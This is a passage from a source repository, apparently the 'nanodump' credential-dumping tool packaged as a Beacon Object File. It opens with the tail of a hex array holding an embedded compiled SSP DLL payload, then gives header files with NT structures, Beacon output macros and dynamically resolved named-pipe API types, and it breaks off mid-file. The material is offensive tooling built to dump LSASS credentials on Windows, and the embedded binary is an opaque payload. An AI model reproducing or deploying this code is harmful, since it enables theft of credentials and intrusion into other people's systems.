63,0x68,0x72,0x00,0x00,0x00,0x00,0xE0,0x00,0x00,0x00,0xE0,0x00,0x00,0x00,0xE0,0x00,0x00,0x00,0xE0,0x00,0x00,0x00,0xE0,0x00,0x00,0x00,0xE0,0x00,0x00,0x00,0xE0,0x00,0x00,0x00,0xE0,0x00,0x00,0x00,0xE0,0x00,0x00,0x00,0xE0,0x00,0x00,0x00,0xE0,0x00,0x00,0x00,0xE0,0x00,0x00,0x00,0xE0,0x00,0x00,0x00,0xE0,0x00,0x00,0x00,0xE0,0x00,0x00,0x00,0xE0,0x00,0x00,0x4B,0x45,0x52,0x4E,0x45,0x4C,0x33,0x32,0x2E,0x64,0x6C,0x6C,0x00,0x00,0x00,0x00,0x14,0xE0,0x00,0x00,0x14,0xE0,0x00,0x00,0x14,0xE0,0x00,0x00,0x14,0xE0,0x00,0x00,0x14,0xE0,0x00,0x00,0x14,0xE0,0x00,0x00,0x14,0xE0,0x00,0x00,0x14,0xE0,0x00,0x00,0x14,0xE0,0x00,0x00,0x14,0xE0,0x00,0x00,0x14,0xE0,0x00,0x00,0x14,0xE0,0x00,0x00,0x14,0xE0,0x00,0x00,0x14,0xE0,0x00,0x00,0x14,0xE0,0x00,0x00,0x14,0xE0,0x00,0x00,0x14,0xE0,0x00,0x00,0x14,0xE0,0x00,0x00,0x14,0xE0,0x00,0x00,0x14,0xE0,0x00,0x00,0x14,0xE0,0x00,0x00,0x14,0xE0,0x00,0x00,0x14,0xE0,0x00,0x00,0x14,0xE0,0x00,0x00,0x14,0xE0,0x00,0x00,0x14,0xE0,0x00,0x00,0x14,0xE0,0x00,0x00,0x6D,0x73,0x76,0x63,0x72,0x74,0x2E,0x64,0x6C,0x6C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x10,0x88,0x6C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x5E,0x88,0x6C,0x80,0x5E,0x88,0x6C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x78,0x00,0x00,0x00,0x09,0x30,0x31,0x30,0x40,0x30,0x47,0x30,0x67,0x30,0x72,0x30,0xAD,0x30,0xDA,0x30,0xE5,0x30,0xF3,0x30,0x00,0x31,0x12,0x31,0x36,0x31,0x4B,0x31,0x56,0x31,0x60,0x31,0x82,0x31,0x92,0x31,0x9E,0x31,0xA5,0x31,0xBC,0x31,0xC3,0x31,0xCE,0x31,0x11,0x32,0x1A,0x32,0x74,0x32,0xB8,0x33,0xEC,0x33,0x0C,0x34,0x12,0x34,0x22,0x34,0x28,0x34,0x2E,0x34,0x36,0x34,0x3E,0x34,0x50,0x34,0x5D,0x34,0x69,0x34,0x70,0x34,0x79,0x34,0xA7,0x34,0xB2,0x34,0xB9,0x34,0xC6,0x34,0xDD,0x34,0xFC,0x35,0x12,0x36,0x54,0x36,0x83,0x36,0x99,0x36,0xEE,0x36,0x04,0x37,0x76,0x37,0x8C,0x37,0x46,0x38,0x00,0x00,0x00,0x20,0x00,0x00,0x38,0x00,0x00,0x00,0x1C,0x30,0x35,0x30,0xB1,0x32,0xC7,0x32,0x4C,0x33,0x65,0x33,0x3E,0x35,0x58,0x35,0x7D,0x37,0xA0,0x37,0xA8,0x37,0xC8,0x39,0x27,0x3A,0x54,0x3B,0x00,0x3C,0x33,0x3D,0x4B,0x3D,0xC4,0x3D,0x06,0x3E,0x1B,0x3E,0x57,0x3E,0x6F,0x3E,0x7C,0x3E,0x00,0x00,0x00,0x30,0x00,0x00,0x0C,0x00,0x00,0x00,0x6B,0x3D,0x00,0x00,0x00,0x40,0x00,0x00,0x20,0x00,0x00,0x00,0xF1,0x34,0x0B,0x35,0x3E,0x38,0x54,0x38,0x30,0x39,0x49,0x39,0x87,0x39,0xA0,0x39,0x64,0x3F,0x8A,0x3F,0xCA,0x3F,0x00,0x00,0x00,0x50,0x00,0x00,0x84,0x00,0x00,0x00,0x04,0x31,0x3D,0x31,0x76,0x31,0xA5,0x31,0xBF,0x31,0x15,0x32,0x39,0x32,0xE7,0x32,0x00,0x33,0x34,0x33,0x63,0x33,0x7D,0x33,0x9A,0x33,0x15,0x34,0x2E,0x34,0x62,0x34,0xAC,0x34,0xF9,0x34,0x28,0x35,0x42,0x35,0xCA,0x35,0xE0,0x35,0x17,0x36,0x31,0x36,0x83,0x36,0x9D,0x36,0x19,0x37,0x2F,0x37,0x6D,0x37,0xCC,0x37,0x07,0x38,0x21,0x38,0xA8,0x38,0xC1,0x38,0x08,0x39,0x77,0x39,0x91,0x39,0xEC,0x39,0x05,0x3A,0x7F,0x3A,0x95,0x3A,0x44,0x3B,0x1E,0x3D,0x34,0x3D,0xC1,0x3D,0xDB,0x3D,0xE7,0x3D,0x09,0x3E,0x23,0x3E,0x2F,0x3E,0x50,0x3E,0x61,0x3E,0x72,0x3E,0xC9,0x3E,0xD5,0x3E,0xF9,0x3E,0xFF,0x3E,0x15,0x3F,0x9D,0x3F,0xDD,0x3F,0xEA,0x3F,0x00,0x00,0x00,0x60,0x00,0x00,0x3C,0x01,0x00,0x00,0x29,0x30,0x45,0x30,0x64,0x30,0x88,0x30,0xB0,0x30,0xCB,0x30,0xD8,0x30,0xDF,0x30,0xF8,0x30,0x0A,0x31,0x1E,0x31,0x3B,0x31,0x52,0x31,0x76,0x31,0x88,0x31,0x8D,0x31,0x92,0x31,0x9D,0x31,0xAB,0x31,0xD5,0x31,0xFC,0x31,0x31,0x32,0x3A,0x32,0x49,0x32,0x54,0x32,0x5A,0x32,0x77,0x32,0xA9,0x32,0xC1,0x32,0xC6,0x32,0xCE,0x32,0xD9,0x32,0xEB,0x32,0x30,0x33,0x36,0x33,0x52,0x33,0x61,0x33,0x67,0x33,0x82,0x33,0x88,0x33,0x93,0x33,0x99,0x33,0xA4,0x33,0xB2,0x33,0xC2,0x33,0xF1,0x33,0x06,0x34,0x16,0x34,0x2C,0x34,0x32,0x34,0x38,0x34,0x45,0x34,0x5E,0x34,0x7C,0x34,0x82,0x34,0xA1,0x34,0xDF,0x34,0xE5,0x34,0xEA,0x34,0xF0,0x34,0xFD,0x34,0x03,0x35,0x28,0x35,0x43,0x35,0x49,0x35,0x4E,0x35,0x83,0x35,0x89,0x35,0xA2,0x35,0xCA,0x35,0xD8,0x35,0xF6,0x35,0x09,0x36,0x12,0x36,0x1D,0x36,0x3B,0x36,0x45,0x36,0x50,0x36,0x56,0x36,0x83,0x36,0x89,0x36,0x3E,0x37,0x48,0x37,0x4E,0x37,0x58,0x37,0x61,0x37,0x6C,0x37,0xD5,0x37,0xDF,0x37,0xE5,0x37,0xEF,0x37,0x03,0x38,0x0F,0x38,0x1D,0x38,0x27,0x38,0x65,0x38,0x6F,0x38,0x75,0x38,0x83,0x38,0x8E,0x38,0xA6,0x38,0xB6,0x38,0xBC,0x38,0xC6,0x38,0xDB,0x38,0xE6,0x38,0xED,0x38,0x25,0x39,0x2F,0x39,0x35,0x39,0x43,0x39,0x4A,0x39,0x65,0x39,0x6E,0x39,0x74,0x39,0x7E,0x39,0x93,0x39,0x9F,0x39,0xB4,0x39,0xF6,0x39,0x07,0x3A,0x0D,0x3A,0x17,0x3A,0x2B,0x3A,0x35,0x3A,0x79,0x3A,0xA0,0x3A,0x3C,0x3B,0xC2,0x3C,0xCA,0x3C,0xD2,0x3C,0xDA,0x3C,0xE2,0x3C,0xEA,0x3C,0xF2,0x3C,0xFA,0x3C,0x02,0x3D,0x0A,0x3D,0x12,0x3D,0x1A,0x3D,0x22,0x3D,0x2A,0x3D,0x32,0x3D,0x3A,0x3D,0x42,0x3D,0x4A,0x3D,0x52,0x3D,0x5A,0x3D,0x62,0x3D,0x6A,0x3D,0x72,0x3D,0x7A,0x3D,0x94,0x3D,0x00,0x00,0x00,0x70,0x00,0x00,0x38,0x00,0x00,0x00,0x20,0x30,0x24,0x30,0x28,0x30,0x2C,0x30,0x30,0x30,0x34,0x30,0x38,0x30,0x3C,0x30,0x40,0x30,0x44,0x30,0x48,0x30,0x4C,0x30,0x50,0x30,0x54,0x30,0x58,0x30,0x5C,0x30,0x60,0x30,0x64,0x30,0x80,0x30,0x90,0x30,0x94,0x30,0x98,0x30,0x9C,0x30,0x00,0x00,0x00,0x80,0x00,0x00,0x14,0x00,0x00,0x00,0xBC,0x32,0xC0,0x32,0xC4,0x32,0xC8,0x32,0xCC,0x32,0x00,0x00,0x00,0xF0,0x00,0x00,0x10,0x00,0x00,0x00,0x0C,0x30,0x18,0x30,0x1C,0x30,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0E,0x00,0x00,0x00,0x2E,0x65,0x68,0x5F,0x66,0x72,0x61,0x6D,0x65,0x00,};
unsigned int nanodump_ssp_dll_len = 37390;


================================================
FILE: Creds-BOF/nanodump/include/ntdefs.h
================================================
#pragma once

#include <windows.h>
#include <winternl.h>

#define NTDLL_DLL L"ntdll.dll"
#define ADVAPI32_DLL L"Advapi32.dll"
#define KERNELBASE_DLL L"KernelBase.dll"
#define KERNEL32_DLL L"Kernel32.dll"
#define SHELL32_DLL L"Shell32.dll"
#define OLEAUT32_DLL L"OleAut32.dll"
#define RPCRT4_DLL L"Rpcrt4.dll"
#define OLE32_DLL L"Ole32.dll"

#define NtCurrentProcess() ( (HANDLE)(LONG_PTR) -1 )
#define NtCurrentThread() ( (HANDLE)(LONG_PTR) -2 )

#ifndef NT_SUCCESS
 #define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
#endif

#define STATUS_SUCCESS 0x00000000
#define STATUS_UNSUCCESSFUL 0xC0000001
#define STATUS_PARTIAL_COPY 0x8000000D
#define STATUS_ACCESS_DENIED 0xC0000022
#define STATUS_OBJECT_PATH_NOT_FOUND 0xC000003A
#define STATUS_OBJECT_NAME_NOT_FOUND 0xC0000034
#define STATUS_OBJECT_NAME_INVALID 0xc0000033
#define STATUS_SHARING_VIOLATION 0xC0000043
#define STATUS_NO_MORE_ENTRIES 0x8000001A
#define STATUS_INVALID_CID 0xC000000B
#define STATUS_INFO_LENGTH_MISMATCH 0xC0000004
#define STATUS_OBJECT_PATH_SYNTAX_BAD 0xC000003B
#define STATUS_BUFFER_TOO_SMALL 0xC0000023
#define STATUS_OBJECT_NAME_COLLISION 0xC0000035
#define STATUS_ALERTED 0x00000101

struct _RTL_BALANCED_NODE
{
    union
    {
        struct _RTL_BALANCED_NODE* Children[2];                             //0x0
        struct
        {
            struct _RTL_BALANCED_NODE* Left;                                //0x0
            struct _RTL_BALANCED_NODE* Right;                               //0x8
        };
    };
    union
    {
        struct
        {
            UCHAR Red:1;                                                    //0x10
            UCHAR Balance:2;                                                //0x10
        };
        ULONGLONG ParentValue;                                              //0x10
    };
};

struct LDR_DATA_TABLE_ENTRY
{
    struct _LIST_ENTRY InLoadOrderLinks;                                    //0x0
    struct _LIST_ENTRY InMemoryOrderLinks;                                  //0x10
    struct _LIST_ENTRY InInitializationOrderLinks;                          //0x20
    PVOID DllBase;                                                          //0x30
    PVOID EntryPoint;                                                       //0x38
    ULONG32 SizeOfImage;                                                    //0x40
    struct _UNICODE_STRING FullDllName;                                     //0x48
    struct _UNICODE_STRING BaseDllName;                                     //0x58
    UCHAR FlagGroup[4];                                                     //0x68
    USHORT ObsoleteLoadCount;                                               //0x6c
    USHORT TlsIndex;                                                        //0x6e
    struct _LIST_ENTRY HashLinks;                                           //0x70
    ULONG TimeDateStamp;                                                    //0x80
    struct _ACTIVATION_CONTEXT* EntryPointActivationContext;                //0x88
    VOID* Lock;                                                             //0x90
    struct _LDR_DDAG_NODE* DdagNode;                                        //0x98
    struct _LIST_ENTRY NodeModuleLink;                                      //0xa0
    struct _LDRP_LOAD_CONTEXT* LoadContext;                                 //0xb0
    VOID* ParentDllBase;                                                    //0xb8
    VOID* SwitchBackContext;                                                //0xc0
    struct _RTL_BALANCED_NODE BaseAddressIndexNode;                         //0xc8
    struct _RTL_BALANCED_NODE MappingInfoIndexNode;                         //0xe0
    ULONGLONG OriginalBase;                                                 //0xf8
    union _LARGE_INTEGER LoadTime;                                          //0x100
    ULONG BaseNameHashValue;                                                //0x108
    ULONG32 LoadReason;                                                     //0x10c
    ULONG ImplicitPathOptions;                                              //0x110
    ULONG ReferenceCount;                                                   //0x114
    ULONG DependentLoadFlags;                                               //0x118
    UCHAR SigningLevel;                                                     //0x11c
    ULONG CheckSum;                                                         //0x120
};


================================================
FILE: Creds-BOF/nanodump/include/output.h
================================================
#pragma once

#ifdef BOF
 #include "beacon.h"
#else
#include <windows.h>
 #include <stdio.h>
#endif

VOID LogToConsole(LPCSTR pwszFormat, ...);

#if defined(BOF)
 #define PRINT(...) { \
     BeaconPrintf(CALLBACK_OUTPUT, __VA_ARGS__); \
 }
#elif defined(DDL) && defined(PPL_DUMP)
 #define PRINT(...) { \
     LogToConsole(__VA_ARGS__); \
     LogToConsole("\n"); \
 }
#elif defined(EXE)
 #define PRINT(...) { \
     fprintf(stdout, __VA_ARGS__); \
     fprintf(stdout, "\n"); \
 }
#else
 #define PRINT(...)
#endif

#if defined(BOF)
 #define PRINT_ERR(...) { \
     BeaconPrintf(CALLBACK_ERROR, __VA_ARGS__); \
 }
#elif defined(DDL) && defined(PPL_DUMP)
 #define PRINT_ERR(...) { \
     LogToConsole(__VA_ARGS__); \
     LogToConsole("\n"); \
 }
#elif defined(EXE)
 #define PRINT_ERR(...) { \
     fprintf(stdout, __VA_ARGS__); \
     fprintf(stdout, "\n"); \
 }
#else
 #define PRINT_ERR(...)
#endif

#if defined(DEBUG) && defined(BOF)
 #define DPRINT(...) { \
     BeaconPrintf(CALLBACK_OUTPUT, "DEBUG: %s:%d:%s(): ", __FILE__, __LINE__, __FUNCTION__); \
     BeaconPrintf(CALLBACK_OUTPUT, __VA_ARGS__); \
 }
#elif defined(DEBUG) && defined(DDL) && defined(PPL_DUMP)
 #define DPRINT(...) { \
     LogToConsole("DEBUG: %s:%d:%s(): ", __FILE__, __LINE__, __FUNCTION__); \
     LogToConsole(__VA_ARGS__); \
     LogToConsole("\n"); \
 }
#elif defined(DEBUG) && defined(EXE)
 #define DPRINT(...) { \
     fprintf(stderr, "DEBUG: %s:%d:%s(): ", __FILE__, __LINE__, __FUNCTION__); \
     fprintf(stderr, __VA_ARGS__); \
     fprintf(stderr, "\n"); \
 }
#else
 #define DPRINT(...)
#endif

#if defined(DEBUG) && defined(BOF)
 #define DPRINT_ERR(...) { \
     BeaconPrintf(CALLBACK_ERROR, "ERROR: %s:%d:%s(): ", __FILE__, __LINE__, __FUNCTION__); \
     BeaconPrintf(CALLBACK_ERROR, __VA_ARGS__); \
 }
#elif defined(DEBUG) && defined(DDL) && defined(PPL_DUMP)
 #define DPRINT_ERR(...) { \
     LogToConsole("ERROR: %s:%d:%s(): ", __FILE__, __LINE__, __FUNCTION__); \
     LogToConsole(__VA_ARGS__); \
     LogToConsole("\n"); \
 }
#elif defined(DEBUG) && defined(EXE)
 #define DPRINT_ERR(...) { \
     fprintf(stderr, "ERROR: %s:%d:%s(): ", __FILE__, __LINE__, __FUNCTION__); \
     fprintf(stderr, __VA_ARGS__); \
     fprintf(stderr, "\n"); \
 }
#else
 #define DPRINT_ERR(...)
#endif

#define syscall_failed(syscall_name, status) \
    DPRINT_ERR( \
        "Failed to call %s, status: 0x%lx", \
        syscall_name, \
        status \
    )

#define function_failed(function) \
    DPRINT_ERR( \
        "Call to '%s' failed, error: %ld", \
        function, \
        GetLastError() \
    )

#define malloc_failed() function_failed("HeapAlloc")

#define api_not_found(function) \
    DPRINT_ERR( \
        "The address of '%s' was not found", \
        function \
    )


================================================
FILE: Creds-BOF/nanodump/include/pipe.h
================================================
#pragma once

#if defined(PPL_MEDIC) || defined(SSP)

#include "dinvoke.h"

typedef BOOL(WINAPI* InitializeSecurityDescriptor_t)(PSECURITY_DESCRIPTOR pSecurityDescriptor, DWORD dwRevision);
typedef BOOL(WINAPI* ConvertStringSecurityDescriptorToSecurityDescriptorW_t)(LPCWSTR StringSecurityDescriptor, DWORD StringSDRevision, PSECURITY_DESCRIPTOR *SecurityDescriptor, PULONG SecurityDescriptorSize);
typedef HANDLE(WINAPI* CreateNamedPipeW_t)(LPCWSTR lpName, DWORD dwOpenMode, DWORD dwPipeMode, DWORD nMaxInstances, DWORD nOutBufferSize, DWORD nInBufferSize, DWORD nDefaultTimeOut, LPSECURITY_ATTRIBUTES lpSecurityAttributes);
typedef HANDLE(WINAPI* CreateFileW_t)(LPCWSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile);
typedef BOOL(WINAPI* ConnectNamedPipe_t)(HANDLE hNamedPipe, LPOVERLAPPED lpOverlapped);
